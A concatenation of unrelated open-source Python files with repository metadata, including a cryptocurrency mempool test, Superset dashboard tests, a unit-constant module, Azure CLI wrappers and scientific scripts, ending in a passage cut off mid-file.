unfuddle/AppEngine/trackable/app.py
|
pdbartlett/misc-stuff
|
0cebbbf30d13a070a663d58519e2dd5c35c765d2
|
[
"Apache-2.0"
] | 1
|
2020-03-24T22:28:58.000Z
|
2020-03-24T22:28:58.000Z
|
unfuddle/AppEngine/trackable/app.py
|
pdbartlett/misc-stuff
|
0cebbbf30d13a070a663d58519e2dd5c35c765d2
|
[
"Apache-2.0"
] | null | null | null |
import wsgiref.handlers
from google.appengine.ext import webapp
import mainpage
import profilepage
import registerpage
def main():
application = webapp.WSGIApplication([
('/', mainpage.Page),
('/profile', profilepage.Page),
('/register', registerpage.Page),
], debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
| 20.842105
| 49
| 0.684343
|
1e3586c64da378a2d9d38302928411d5b5e04993
| 4,538
|
py
|
Python
|
test/functional/sapling_mempool.py
|
ComputerCraftr/peps-new
|
e92cc732a96a567b66c0ce665a03496e15b2702d
|
[
"MIT"
] | 3
|
2021-07-08T20:51:48.000Z
|
2021-12-19T01:35:23.000Z
|
test/functional/sapling_mempool.py
|
theabundancecoin/TACC
|
fd7d38c6a04dcb2da3b2755879b153b4731cddb2
|
[
"MIT"
] | null | null | null |
test/functional/sapling_mempool.py
|
theabundancecoin/TACC
|
fd7d38c6a04dcb2da3b2755879b153b4731cddb2
|
[
"MIT"
] | 1
|
2021-07-25T22:35:58.000Z
|
2021-07-25T22:35:58.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2020 The PIVX Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import PivxTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
from decimal import Decimal
# Test mempool interaction with Sapling transactions
class SaplingMempoolTest(PivxTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [['-nuparams=v5_shield:1']] * self.num_nodes
def run_test(self):
miner = self.nodes[0]
alice = self.nodes[1]
# Fixed fee
fee = 0.05
self.log.info("Mining 120 blocks...")
miner.generate(120)
self.sync_all()
# Sanity-check the test harness
assert_equal([x.getblockcount() for x in self.nodes], [120] * self.num_nodes)
# miner sends a 10 PIV note to Alice
self.log.info("Shielding some coins for Alice...")
alice_zaddr = alice.getnewshieldaddress()
miner.shieldsendmany("from_transparent", [{"address": alice_zaddr, "amount": Decimal('10.00')}], 1, fee)
miner.generate(1)
self.sync_all()
assert_equal(alice.getshieldbalance(alice_zaddr), Decimal('10.00'))
# Alice creates (but doesn't send) tx_A to transparent address tadd_A
self.log.info("Alice creating tx_A...")
tadd_A = alice.getnewaddress()
rawTx_hex = alice.rawshieldsendmany(alice_zaddr, [{"address": tadd_A, "amount": Decimal('9.00')}], 1, fee)
# Alice creates and sends tx_B, unshielding the same note to tadd_B
self.log.info("Alice creating and sending tx_B...")
tadd_B = alice.getnewaddress()
txid_B = alice.shieldsendmany(alice_zaddr, [{"address": tadd_B, "amount": Decimal('9.95')}], 1, fee)
# Miner receives tx_B and accepts it in the mempool
assert (txid_B in alice.getrawmempool())
self.sync_mempools()
assert(txid_B in miner.getrawmempool())
self.log.info("tx_B accepted in the memory pool.")
# Now tx_A would double-spend the sapling note in the memory pool
assert_raises_rpc_error(-26, "bad-txns-nullifier-double-spent",
alice.sendrawtransaction, rawTx_hex)
self.log.info("tx_A NOT accepted in the mempool. Good.")
# Mine tx_B and try to send tx_A again
self.log.info("Mine a block and verify that tx_B gets on chain")
miner.generate(1)
self.sync_all()
txB_json = alice.getrawtransaction(txid_B, True)
assert("blockhash" in txB_json)
self.log.info("trying to relay tx_A again...")
assert_raises_rpc_error(-26, "bad-txns-shielded-requirements-not-met",
alice.sendrawtransaction, rawTx_hex)
self.log.info("tx_A NOT accepted in the mempool. Good.")
# miner sends another 10 PIV note to Alice
self.log.info("Shielding some more coins for Alice...")
miner.shieldsendmany("from_transparent", [{"address": alice_zaddr, "amount": Decimal('10.00')}], 1, fee)
miner.generate(1)
self.sync_all()
assert_equal(alice.getshieldbalance(alice_zaddr), Decimal('10.00'))
# Alice creates and sends tx_C, unshielding the note to tadd_C
self.log.info("Alice creating and sending tx_C...")
tadd_C = alice.getnewaddress()
txC_hex = alice.rawshieldsendmany(alice_zaddr, [{"address": tadd_C, "amount": Decimal('9.00')}], 1, fee)
txid_C = alice.sendrawtransaction(txC_hex)
# Miner receives tx_C and accepts it in the mempool
self.sync_mempools()
assert(txid_C in miner.getrawmempool())
self.log.info("tx_C accepted in the memory pool.")
# Now disconnect the block with the note's anchor,
# and check that the tx is removed from the mempool
self.log.info("Disconnect the last block to change the sapling anchor")
anchor = alice.decoderawtransaction(txC_hex)['vShieldSpend'][0]['anchor']
assert_equal(anchor, miner.getbestsaplinganchor())
miner.invalidateblock(miner.getbestblockhash())
assert (anchor != miner.getbestsaplinganchor())
assert(txid_C not in miner.getrawmempool())
self.log.info("Good. tx_C removed from the memory pool.")
if __name__ == '__main__':
SaplingMempoolTest().main()
| 42.811321
| 114
| 0.659101
|
ce323b97068ed21757533f3de9b0c080b1946d21
| 2,763
|
py
|
Python
|
wfsim/units.py
|
WenzDaniel/WFSim
|
89d8ea149215a158b48b1d38c72af1a2f1e9c5c0
|
[
"BSD-3-Clause"
] | null | null | null |
wfsim/units.py
|
WenzDaniel/WFSim
|
89d8ea149215a158b48b1d38c72af1a2f1e9c5c0
|
[
"BSD-3-Clause"
] | null | null | null |
wfsim/units.py
|
WenzDaniel/WFSim
|
89d8ea149215a158b48b1d38c72af1a2f1e9c5c0
|
[
"BSD-3-Clause"
] | null | null | null |
"""Define unit system for pax (i.e., seconds, etc.)
This sets up variables for the various unit abbreviations, ensuring we always
have a 'consistent' unit system. There are almost no cases that you should
change this without talking with a maintainer.
"""
from __future__ import division
# From physics.nist.gov, January 2015
electron_charge_SI = 1.602176565 * 10 ** (-19)
boltzmannConstant_SI = 1.3806488 * 10 ** (-23)
m = 10 ** 2 # distances in cm
s = 10 ** 9 # times in ns
eV = 1 # energies in eV
C = 1 / electron_charge_SI # Charge in # electrons, so voltage in Volts
K = 1 # Temperature in Kelvins
# derived units
Hz = 1 / s
J = eV / electron_charge_SI
kg = J * s ** 2 / m ** 2
V = J / C
A = C / s
N = J / m
Pa = N / m ** 2
bar = 10 ** 5 * Pa
Ohm = V / A
# 10 ^ -3 base units
mm = 10 ** (-3) * m
ms = 10 ** (-3) * s
mK = 10 ** (-3) * K
mC = 10 ** (-3) * C
meV = 10 ** (-3) * eV
mHz = 10 ** (-3) * Hz
mJ = 10 ** (-3) * J
g = 10 ** (-3) * kg
mV = 10 ** (-3) * V
mA = 10 ** (-3) * A
mN = 10 ** (-3) * N
mPa = 10 ** (-3) * Pa
mbar = 10 ** (-3) * bar
mOhm = 10 ** (-3) * Ohm
# 10 ^ -6 base units
um = 10 ** (-6) * m
us = 10 ** (-6) * s
uK = 10 ** (-6) * K
uC = 10 ** (-6) * C
ueV = 10 ** (-6) * eV
uHz = 10 ** (-6) * Hz
uJ = 10 ** (-6) * J
mg = 10 ** (-6) * kg
uV = 10 ** (-6) * V
uA = 10 ** (-6) * A
uN = 10 ** (-6) * N
uPa = 10 ** (-6) * Pa
ubar = 10 ** (-6) * bar
uOhm = 10 ** (-6) * Ohm
# 10 ^ -9 base units
nm = 10 ** (-9) * m
ns = 10 ** (-9) * s
nK = 10 ** (-9) * K
nC = 10 ** (-9) * C
neV = 10 ** (-9) * eV
nHz = 10 ** (-9) * Hz
nJ = 10 ** (-9) * J
ug = 10 ** (-9) * kg
nV = 10 ** (-9) * V
nA = 10 ** (-9) * A
nN = 10 ** (-9) * N
nPa = 10 ** (-9) * Pa
nbar = 10 ** (-9) * bar
nOhm = 10 ** (-9) * Ohm
# 10 ^ 3 base units
km = 10 ** 3 * m
ks = 10 ** 3 * s
kK = 10 ** 3 * K
kC = 10 ** 3 * C
keV = 10 ** 3 * eV
kHz = 10 ** 3 * Hz
kJ = 10 ** 3 * J
Mg = 10 ** 3 * kg
kV = 10 ** 3 * V
kA = 10 ** 3 * A
kN = 10 ** 3 * N
kOhm = 10 ** 3 * Ohm
kbar = 10 ** 3 * bar
kPa = 10 ** 3 * Pa
# 10 ^ 6 base units
Mm = 10 ** 6 * m
Ms = 10 ** 6 * s
MK = 10 ** 6 * K
MC = 10 ** 6 * C
MeV = 10 ** 6 * eV
MHz = 10 ** 6 * Hz
MJ = 10 ** 6 * J
Gg = 10 ** 6 * kg
MV = 10 ** 6 * V
MA = 10 ** 6 * A
MN = 10 ** 6 * N
MOhm = 10 ** 6 * Ohm
Mbar = 10 ** 6 * bar
MPa = 10 ** 6 * Pa
# 10 ^ 9 base units
Gm = 10 ** 9 * m
Gs = 10 ** 9 * s
GK = 10 ** 9 * K
GC = 10 ** 9 * C
GeV = 10 ** 9 * eV
GHz = 10 ** 9 * Hz
GJ = 10 ** 9 * J
GV = 10 ** 9 * V
GA = 10 ** 9 * A
GN = 10 ** 9 * N
GOhm = 10 ** 9 * Ohm
Gbar = 10 ** 9 * bar
GPa = 10 ** 9 * Pa
# other units
cm = 10 ** (-2) * m
ng = 10 ** (-12) * kg
# Townsend (unit for reduced electric field)
Td = 10 ** (-17) * V / cm ** 2 # noqa
electron_charge = electron_charge_SI * C
boltzmannConstant = boltzmannConstant_SI * J / K
| 19.735714
| 77
| 0.475208
|
890b060d60c62c0beb6cf2f5884804ea67aacfd0
| 246
|
py
|
Python
|
setup.py
|
dgitts/electric-load-forecasting
|
9fd6ccac52d76d6395fd8650b8380ab5122aef41
|
[
"MIT"
] | null | null | null |
setup.py
|
dgitts/electric-load-forecasting
|
9fd6ccac52d76d6395fd8650b8380ab5122aef41
|
[
"MIT"
] | null | null | null |
setup.py
|
dgitts/electric-load-forecasting
|
9fd6ccac52d76d6395fd8650b8380ab5122aef41
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='Energy load forecasting for commercial buildings.',
author='Colaberry DS3 Aug 2021',
license='MIT',
)
| 22.363636
| 68
| 0.691057
|
94fb806eca46c20e3a8cea6c824b16b622473846
| 2,370
|
py
|
Python
|
watertap/examples/flowsheets/case_studies/wastewater_resource_recovery/electrochemical_nutrient_removal/multi_sweep.py
|
kurbansitterley/watertap
|
1a8986a779bdcb36f1481f03eed24c6c42d26481
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
watertap/examples/flowsheets/case_studies/wastewater_resource_recovery/electrochemical_nutrient_removal/multi_sweep.py
|
kurbansitterley/watertap
|
1a8986a779bdcb36f1481f03eed24c6c42d26481
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
watertap/examples/flowsheets/case_studies/wastewater_resource_recovery/electrochemical_nutrient_removal/multi_sweep.py
|
kurbansitterley/watertap
|
1a8986a779bdcb36f1481f03eed24c6c42d26481
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
import os
import sys
from watertap.tools.parameter_sweep import (
_init_mpi,
LinearSample,
parameter_sweep,
)
import watertap.examples.flowsheets.case_studies.wastewater_resource_recovery.electrochemical_nutrient_removal.electrochemical_nutrient_removal as electrochemical_nutrient_removal
def set_up_sensitivity(m):
outputs = {}
optimize_kwargs = {"check_termination": False}
opt_function = electrochemical_nutrient_removal.solve
# create outputs
outputs["LCOW"] = m.fs.costing.LCOW
outputs["LCOS"] = m.fs.costing.LCOS
return outputs, optimize_kwargs, opt_function
def run_analysis(case_num=1, nx=11, interpolate_nan_outputs=True):
m = electrochemical_nutrient_removal.main()[0]
outputs, optimize_kwargs, opt_function = set_up_sensitivity(m)
sweep_params = {}
if case_num == 1:
# sensitivity analysis
sweep_params["MgCl2_cost"] = LinearSample(
m.fs.costing.magnesium_chloride_cost, 135, 538, nx
)
else:
raise ValueError(f"{case_num} is not yet implemented")
output_filename = "sensitivity_" + str(case_num) + ".csv"
output_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
output_filename,
)
global_results = parameter_sweep(
m,
sweep_params,
outputs,
csv_results_file_name=output_path,
optimize_function=opt_function,
optimize_kwargs=optimize_kwargs,
interpolate_nan_outputs=interpolate_nan_outputs,
)
return global_results, sweep_params, m
if __name__ == "__main__":
results, sweep_params, m = run_analysis(*sys.argv[1:])
| 32.916667
| 179
| 0.679747
|
1190d764039a191d28d54b686a278795cfe72845
| 2,344
|
py
|
Python
|
test/pyaz/iot/hub/routing_endpoint/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/iot/hub/routing_endpoint/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/iot/hub/routing_endpoint/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def create(hub_name, endpoint_name, endpoint_type, endpoint_resource_group, endpoint_subscription_id, connection_string=None, container_name=None, encoding=None, resource_group=None, batch_frequency=None, chunk_size=None, file_name_format=None, auth_type=None, endpoint_uri=None, entity_path=None, identity=None):
params = get_params(locals())
command = "az iot hub routing-endpoint create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(hub_name, endpoint_name, resource_group=None):
params = get_params(locals())
command = "az iot hub routing-endpoint show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(hub_name, endpoint_type=None, resource_group=None):
params = get_params(locals())
command = "az iot hub routing-endpoint list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(hub_name, endpoint_name=None, endpoint_type=None, resource_group=None):
params = get_params(locals())
command = "az iot hub routing-endpoint delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 39.066667
| 313
| 0.6907
|
194ba122619056ba71cbec6542fccb01ebe8d97e
| 13,070
|
py
|
Python
|
tests/dashboard_tests.py
|
MukaJiTrue/incubator-superset
|
e2854994bae0e390bfbf446c94ccb4a86792220b
|
[
"Apache-2.0"
] | 2
|
2021-04-14T01:20:33.000Z
|
2021-07-01T16:38:25.000Z
|
tests/dashboard_tests.py
|
sleepyhton/incubator-superset
|
3c17dac35a169afafe0ae3fbfd74618eacb4e642
|
[
"Apache-2.0"
] | 37
|
2020-03-24T16:43:05.000Z
|
2022-03-24T04:31:53.000Z
|
tests/dashboard_tests.py
|
sleepyhton/incubator-superset
|
3c17dac35a169afafe0ae3fbfd74618eacb4e642
|
[
"Apache-2.0"
] | 1
|
2019-06-05T10:15:05.000Z
|
2019-06-05T10:15:05.000Z
|
"""Unit tests for Superset"""
import json
import unittest
from flask import escape
from superset import db, security_manager
from superset.connectors.sqla.models import SqlaTable
from superset.models import core as models
from .base_tests import SupersetTestCase
class DashboardTests(SupersetTestCase):
def __init__(self, *args, **kwargs):
super(DashboardTests, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def get_mock_positions(self, dash):
positions = {
'DASHBOARD_VERSION_KEY': 'v2',
}
for i, slc in enumerate(dash.slices):
id = 'DASHBOARD_CHART_TYPE-{}'.format(i)
d = {
'type': 'DASHBOARD_CHART_TYPE',
'id': id,
'children': [],
'meta': {
'width': 4,
'height': 50,
'chartId': slc.id,
},
}
positions[id] = d
return positions
def test_dashboard(self):
self.login(username='admin')
urls = {}
for dash in db.session.query(models.Dashboard).all():
urls[dash.dashboard_title] = dash.url
for title, url in urls.items():
assert escape(title) in self.client.get(url).data.decode('utf-8')
def test_dashboard_modes(self):
self.login(username='admin')
dash = (
db.session.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
url = dash.url
if dash.url.find('?') == -1:
url += '?'
else:
url += '&'
resp = self.get_resp(url + 'edit=true&standalone=true')
self.assertIn('editMode": true', resp)
self.assertIn('standalone_mode": true', resp)
def test_save_dash(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
positions = self.get_mock_positions(dash)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
}
url = '/superset/save_dash/{}/'.format(dash.id)
resp = self.get_resp(url, data=dict(data=json.dumps(data)))
self.assertIn('SUCCESS', resp)
def test_save_dash_with_filter(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
positions = self.get_mock_positions(dash)
filters = {str(dash.slices[0].id): {'region': ['North America']}}
default_filters = json.dumps(filters)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
'default_filters': default_filters,
}
url = '/superset/save_dash/{}/'.format(dash.id)
resp = self.get_resp(url, data=dict(data=json.dumps(data)))
self.assertIn('SUCCESS', resp)
updatedDash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
new_url = updatedDash.url
self.assertIn('region', new_url)
resp = self.get_resp(new_url)
self.assertIn('North America', resp)
def test_save_dash_with_invalid_filters(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
# add an invalid filter slice
positions = self.get_mock_positions(dash)
filters = {str(99999): {'region': ['North America']}}
default_filters = json.dumps(filters)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
'default_filters': default_filters,
}
url = '/superset/save_dash/{}/'.format(dash.id)
resp = self.get_resp(url, data=dict(data=json.dumps(data)))
self.assertIn('SUCCESS', resp)
updatedDash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
new_url = updatedDash.url
self.assertNotIn('region', new_url)
def test_save_dash_with_dashboard_title(self, username='admin'):
self.login(username=username)
dash = (
db.session.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
origin_title = dash.dashboard_title
positions = self.get_mock_positions(dash)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': 'new title',
}
url = '/superset/save_dash/{}/'.format(dash.id)
self.get_resp(url, data=dict(data=json.dumps(data)))
updatedDash = (
db.session.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
self.assertEqual(updatedDash.dashboard_title, 'new title')
# bring back dashboard original title
data['dashboard_title'] = origin_title
self.get_resp(url, data=dict(data=json.dumps(data)))
def test_copy_dash(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
positions = self.get_mock_positions(dash)
data = {
'css': '',
'duplicate_slices': False,
'expanded_slices': {},
'positions': positions,
'dashboard_title': 'Copy Of Births',
}
# Save changes to Births dashboard and retrieve updated dash
dash_id = dash.id
url = '/superset/save_dash/{}/'.format(dash_id)
self.client.post(url, data=dict(data=json.dumps(data)))
dash = db.session.query(models.Dashboard).filter_by(
id=dash_id).first()
orig_json_data = dash.data
# Verify that copy matches original
url = '/superset/copy_dash/{}/'.format(dash_id)
resp = self.get_json_resp(url, data=dict(data=json.dumps(data)))
self.assertEqual(resp['dashboard_title'], 'Copy Of Births')
self.assertEqual(resp['position_json'], orig_json_data['position_json'])
self.assertEqual(resp['metadata'], orig_json_data['metadata'])
# check every attribute in each dashboard's slices list,
# exclude modified and changed_on attribute
for index, slc in enumerate(orig_json_data['slices']):
for key in slc:
if key not in ['modified', 'changed_on']:
self.assertEqual(slc[key], resp['slices'][index][key])
def test_add_slices(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
new_slice = db.session.query(models.Slice).filter_by(
slice_name='Energy Force Layout').first()
existing_slice = db.session.query(models.Slice).filter_by(
slice_name='Name Cloud').first()
data = {
'slice_ids': [new_slice.data['slice_id'],
existing_slice.data['slice_id']],
}
url = '/superset/add_slices/{}/'.format(dash.id)
resp = self.client.post(url, data=dict(data=json.dumps(data)))
assert 'SLICES ADDED' in resp.data.decode('utf-8')
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
new_slice = db.session.query(models.Slice).filter_by(
slice_name='Energy Force Layout').first()
assert new_slice in dash.slices
assert len(set(dash.slices)) == len(dash.slices)
# cleaning up
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
dash.slices = [
o for o in dash.slices if o.slice_name != 'Energy Force Layout']
db.session.commit()
def test_remove_slices(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
origin_slices_length = len(dash.slices)
positions = self.get_mock_positions(dash)
# remove one chart
chart_keys = []
for key in positions.keys():
if key.startswith('DASHBOARD_CHART_TYPE'):
chart_keys.append(key)
positions.pop(chart_keys[0])
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
}
# save dash
dash_id = dash.id
url = '/superset/save_dash/{}/'.format(dash_id)
self.client.post(url, data=dict(data=json.dumps(data)))
dash = db.session.query(models.Dashboard).filter_by(
id=dash_id).first()
# verify slices data
data = dash.data
self.assertEqual(len(data['slices']), origin_slices_length - 1)
def test_public_user_dashboard_access(self):
table = (
db.session
.query(SqlaTable)
.filter_by(table_name='birth_names')
.one()
)
# Try access before adding appropriate permissions.
self.revoke_public_access_to_table(table)
self.logout()
resp = self.get_resp('/chart/list/')
self.assertNotIn('birth_names</a>', resp)
resp = self.get_resp('/dashboard/list/')
self.assertNotIn('/superset/dashboard/births/', resp)
self.grant_public_access_to_table(table)
# Try access after adding appropriate permissions.
self.assertIn('birth_names', self.get_resp('/chart/list/'))
resp = self.get_resp('/dashboard/list/')
self.assertIn('/superset/dashboard/births/', resp)
self.assertIn('Births', self.get_resp('/superset/dashboard/births/'))
# Confirm that public doesn't have access to other datasets.
resp = self.get_resp('/chart/list/')
self.assertNotIn('wb_health_population</a>', resp)
resp = self.get_resp('/dashboard/list/')
self.assertNotIn('/superset/dashboard/world_health/', resp)
def test_dashboard_with_created_by_can_be_accessed_by_public_users(self):
self.logout()
table = (
db.session
.query(SqlaTable)
.filter_by(table_name='birth_names')
.one()
)
self.grant_public_access_to_table(table)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
dash.owners = [security_manager.find_user('admin')]
dash.created_by = security_manager.find_user('admin')
db.session.merge(dash)
db.session.commit()
assert 'Births' in self.get_resp('/superset/dashboard/births/')
def test_only_owners_can_save(self):
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
dash.owners = []
db.session.merge(dash)
db.session.commit()
self.test_save_dash('admin')
self.logout()
self.assertRaises(
Exception, self.test_save_dash, 'alpha')
alpha = security_manager.find_user('alpha')
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
dash.owners = [alpha]
db.session.merge(dash)
db.session.commit()
self.test_save_dash('alpha')
def test_owners_can_view_empty_dashboard(self):
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='empty_dashboard')
.first()
)
if not dash:
dash = models.Dashboard()
dash.dashboard_title = 'Empty Dashboard'
dash.slug = 'empty_dashboard'
else:
dash.slices = []
dash.owners = []
db.session.merge(dash)
db.session.commit()
gamma_user = security_manager.find_user('gamma')
self.login(gamma_user.username)
resp = self.get_resp('/dashboard/list/')
self.assertNotIn('/superset/dashboard/empty_dashboard/', resp)
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='empty_dashboard')
.first()
)
dash.owners = [gamma_user]
db.session.merge(dash)
db.session.commit()
resp = self.get_resp('/dashboard/list/')
self.assertIn('/superset/dashboard/empty_dashboard/', resp)
if __name__ == '__main__':
unittest.main()
| 34.036458
| 80
| 0.579265
|
e8d777f9adf55581baffc4eb4e74d8724888b497
| 2,650
|
py
|
Python
|
scripts/visualize_segments.py
|
shiyoung77/symseg
|
bc68de2bf6ac34b56dc7f29d133f2ca22e1fd975
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/visualize_segments.py
|
shiyoung77/symseg
|
bc68de2bf6ac34b56dc7f29d133f2ca22e1fd975
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/visualize_segments.py
|
shiyoung77/symseg
|
bc68de2bf6ac34b56dc7f29d133f2ca22e1fd975
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import argparse
import numpy as np
import open3d as o3d
import networkx as nx
def filter_segments(segments):
segments = [set(segment) for segment in segments]
N = len(segments)
print(f"number of segments before filtering: {N}")
G = nx.Graph()
G.add_nodes_from(range(N))
for i in range(len(segments)):
for j in range(i, len(segments)):
n1 = len(segments[i])
n2 = len(segments[j])
iou = len(segments[i] & segments[j]) / (n1 + n2)
if iou > 0.3:
G.add_edge(i, j)
filtered_segments = []
# connected components
cc_list = list(nx.connected_components(G))
for cc in cc_list:
cc = list(cc)
indices = segments[cc[0]]
for i in range(1, len(cc)):
indices &= segments[cc[i]]
filtered_segments.append(list(indices))
print(f"number of segments after filtering: {len(filtered_segments)}")
return filtered_segments
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# parser.add_argument("-d", "--dataset", type=str, default='dataset')
# parser.add_argument("-d", "--dataset", type=str, default='/home/lsy/dataset/ycb_video')
parser.add_argument("-d", "--dataset", type=str, default='/home/lsy/dataset/icra22_custom_ycb')
parser.add_argument("-v", "--video", type=str, default="0020")
args = parser.parse_args()
video_folder = os.path.join(args.dataset, args.video)
pcd = o3d.io.read_point_cloud(os.path.join(video_folder, 'sampled_pcd/cloud.pcd'))
# o3d.visualization.draw_geometries([pcd])
segments_file = os.path.join(video_folder, 'sampled_pcd/results/segments.txt')
with open(segments_file, 'r') as f:
segments = [line.strip().split() for line in f.readlines()]
for i, segment in enumerate(segments):
segments[i] = [int(idx) for idx in segment]
segments = filter_segments(segments)
segmented_indices = set()
for segment in segments:
segmented_indices = segmented_indices.union(segment)
all_indices = set(range(len(pcd.points)))
unsegmented_indices = all_indices - segmented_indices
print(f"{len(segmented_indices) = }")
print(f"{len(unsegmented_indices) = }")
random_colors = np.random.random((100, 3))
segment_pcds = [pcd.select_by_index(segment).paint_uniform_color(random_colors[i]) for i, segment in enumerate(segments)]
unsegmented_pcd = pcd.select_by_index(list(unsegmented_indices)).paint_uniform_color([0, 0, 0])
print(f"number of segments: {len(segment_pcds)}")
o3d.visualization.draw_geometries(segment_pcds + [unsegmented_pcd])
| 34.868421
| 125
| 0.666038
|
7c604b7b0343c1a2565fc4f8abcae24dabc7b1da
| 5,825
|
py
|
Python
|
build/env/lib/python2.7/site-packages/windmill-1.3-py2.7.egg/windmill/browser/__init__.py
|
lumanjiao/XLS_BigData
|
2c4c37872b8636df1c8b0e005bc12a635a753c7a
|
[
"Apache-2.0"
] | 11
|
2019-03-20T07:38:35.000Z
|
2021-06-18T09:42:46.000Z
|
build/env/lib/python2.6/site-packages/windmill-1.3-py2.6.egg/windmill/browser/__init__.py
|
lockhart39/HueQualityAndIngestionApp
|
c75e55a43a8bdeb7aa0f5bf2101ec72b01dcac1c
|
[
"Apache-2.0"
] | null | null | null |
build/env/lib/python2.6/site-packages/windmill-1.3-py2.6.egg/windmill/browser/__init__.py
|
lockhart39/HueQualityAndIngestionApp
|
c75e55a43a8bdeb7aa0f5bf2101ec72b01dcac1c
|
[
"Apache-2.0"
] | 5
|
2019-06-29T03:13:02.000Z
|
2020-04-23T04:47:11.000Z
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
# Copyright (c) 2009 Domen Kozar <domen@dev.si>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
import sys
import copy
from pkg_resources import resource_string
import os
if not sys.version.startswith('2.4'):
from urlparse import urlparse
else:
# python 2.4
from windmill.tools.urlparse_25 import urlparse
windmill.browser_registry = {}
def get_firefox_controller():
"""Get the firefox browser object"""
from windmill.dep import mozrunner
global_settings = mozrunner.global_settings
from windmill.dep import simplesettings
mozrunner_settings = simplesettings.initialize_settings(global_settings, mozrunner,
local_env_variable=mozrunner.settings_env)
for key, value in mozrunner.settings.items():
if not windmill.settings.has_key(key):
windmill.settings[key] = value
test_url = windmill.get_test_url(windmill.settings['TEST_URL'])
if windmill.settings['INSTALL_FIREBUG']:
